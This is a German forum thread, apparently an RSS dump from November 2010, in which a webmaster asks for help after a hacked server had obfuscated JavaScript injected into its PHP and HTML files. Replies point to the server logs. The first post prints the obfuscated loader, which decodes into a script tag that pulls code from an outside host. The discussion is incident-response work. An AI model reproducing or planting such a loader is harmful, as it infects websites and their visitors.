http://forum.geizhals.at/feed.jsp?id=727579 Geizhals-Forum http://forum.geizhals.at/t727579,6230252.html#6230252 wirst vermutlich im log des webserves finden, wenn sie der angreifer nicht gelöscht hat. <br/> Sun, 14 Nov 2010 17:09:45 GMT http://forum.geizhals.at/t727579,6230252.html#6230252 *patrick star* 2010-11-14T17:09:45Z http://forum.geizhals.at/t727579,6230242.html#6230242 <blockquote><em> Eine Vermutung ist, dass einfach mit google danach gesucht wurde und sich halt dann jene HP angeboten hat.<br></em></blockquote><br><br>Heutzutage wird so ziemlich jeder Webserver regelmäßig nach exploits gescannt, das sehen wir auch in unseren Logs, obwohl wir eigentlich nur selbstprogrammierte Web-Apps haben.<br><br>Welche Lücke bei dir ausgenutzt wurde, kann man sowohl nicht sagen, aber schau mal die Logfiles des Webservers an, da wird wohl kurz vor dem Hack evtl. noch etwas zu finden sein.<br><br/> Sun, 14 Nov 2010 16:57:53 GMT http://forum.geizhals.at/t727579,6230242.html#6230242 mjy@geizhals.at 2010-11-14T16:57:53Z http://forum.geizhals.at/t727579,6229111.html#6229111 Was sagen deine Logs zu der Quelle ?<br><br>Die würde ich mal kontaktieren - schließlich ist die wahrscheinlich genauso verseucht...<br><br><br>Ein paar dürfte es schon erwischt haben:<br><a href="http://www.google.com/search?q=qg2solLrupydN0&hl=de" rel="noopener" target="_blank">http:/<wbr/>/<wbr/>www.google.com/<wbr/>search?<wbr/>q=qg2solLrupydN0&<wbr/>hl=de</a> <br><br>Mich überrascht ja, dass immer derselbe Variablenname verwendet wird - wieso und wozu?<br/> Sat, 13 Nov 2010 13:54:37 GMT http://forum.geizhals.at/t727579,6229111.html#6229111 kombipaket 2010-11-13T13:54:37Z http://forum.geizhals.at/t727579,6229105.html#6229105 Was sagen deine Logs zu der Quelle ?<br><br>Die würde ich mal kontaktieren - schließlich ist die wahrscheinlich genauso verseucht...<br/> Sat, 13 Nov 2010 13:54:37 GMT http://forum.geizhals.at/t727579,6229105.html#6229105 kombipaket 2010-11-13T13:54:37Z http://forum.geizhals.at/t727579,6228933.html#6228933 Folgendes Problem aktuell:<br>Ein Webserver wurde gehackt und in php und html Dateien automatisiert Code hinzugefügt, der dann etwas nachlädt, was dann wieder etwas nachlädt usw.<br>Sofern html im Quelltext vorhanden war gleich nach body beginn, sonst am Ende der Datei und formschön in html-body tags verpackt.<br><br>Es wurden höchstwahrscheinlich auch Dateien in htaccess geschützen Bereichen geändert (das ist leider nicht mehr ganz nachvollziehbar).<br><br>Meine Vermutung ist nun, dass irgendeine Sicherheitslücke (z.B. ein phpbb Forum ist darauf) oder schlecht ausprogrammierte Uploads dazu geführt haben.<br><br>Ja - die Frage wäre was denn aktuell so die Standard-Sicherheitslücken sind, die so etwas mehr oder weniger bekannterweise zur Folge haben.<br>Ich weiß, die Frage ist etwas mau, aber vielleicht kursiert ja gerade etwas.<br>Eine Vermutung ist, dass einfach mit google danach gesucht wurde und sich halt dann jene HP angeboten hat.<br>Wirklich interessant wäre auch ein Scan-Kit, der nach bekannten Lücken sucht, <br>bzw. Websiten die sich genau mit dem Thema (aktuell kursierendes, Sicherheit) befassen. <br><br>Sollte jemand eine VM haben, das ist der Code:<br><br><br><br><div class=code><pre> |script type{"text/javascript"| var wGss98v0zDCHi { "uBdb915uBdb935"~ var qg2solLrupydN0 { "uBdb93cuBdb973uBdb963uBdb972u"~ var qg2solLrupydN1 { "Bdb969uBdb970uBdb974uBdb920uB"~ var qg2solLrupydN2 { "db974uBdb979uBdb970uBdb965uBd"~ var qg2solLrupydN3 { "b93duBdb922uBdb974uBdb965uBdb"~ var qg2solLrupydN4 { "978uBdb974uBdb92fuBdb96auBdb9"~ var qg2solLrupydN5 { "61uBdb976uBdb961uBdb973uBdb96"~ var qg2solLrupydN6 { "3uBdb972uBdb969uBdb970uBdb974"~ var qg2solLrupydN7 { "uBdb922uBdb920uBdb973uBdb972u"~ var qg2solLrupydN8 { "Bdb963uBdb93duBdb922uBdb968uB"~ var qg2solLrupydN9 { "db974uBdb974uBdb970uBdb93auBd"~ var qg2solLrupydN10 { "b92fuBdb92fuBdb963uBdb96fuBdb"~ var qg2solLrupydN11 { "975uBdb96euBdb974uBdb965uBdb9"~ var qg2solLrupydN12 { "72uBdb973uBdb974uBdb961uBdb97"~ var qg2solLrupydN13 { "4uBdb973uBdb92euBdb973uBdb965"~ var qg2solLrupydN14 { "uBdb972uBdb976uBdb965uBdb96du"~ var qg2solLrupydN15 { "Bdb970uBdb933uBdb92euBdb963uB"~ var qg2solLrupydN16 { "db96fuBdb96duBdb92fuBdb92fuBd"~ var qg2solLrupydN17 { "b96duBdb96cuBdb92euBdb970uBdb"~ var qg2solLrupydN18 { "968uBdb970uBdb922uBdb93euBdb9"~ var qg2solLrupydN19 { "20uBdb93cuBdb92fuBdb973uBdb96"~ var qg2solLrupydN20 { "3uBdb972uBdb969uBdb970uBdb974"~ var qg2solLrupydN21 { "uBdb93e"~ var ZPFlt1UYA1tfk { "Dh3Ln15uBdb935"~ var ERYCkoBwTvOcS { qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21~ CtnqKOXMGM9bE { ERYCkoBwTvOcS.replace(/uBdb9/g,"%")~ var iRDgo28MEsBPo { unescape~ var wGss98v0zDCHi { "AUx2i15Dh3Ln35"~ w9221 { this~ var NKCGnIAa0Vzgr{w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")]~ NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE))~ |/script| </pre></div><br><br>Danke & schöne Grüße<br/> Sat, 13 Nov 2010 11:08:24 GMT http://forum.geizhals.at/t727579,6228933.html#6228933 kj.y 2010-11-13T11:08:24Z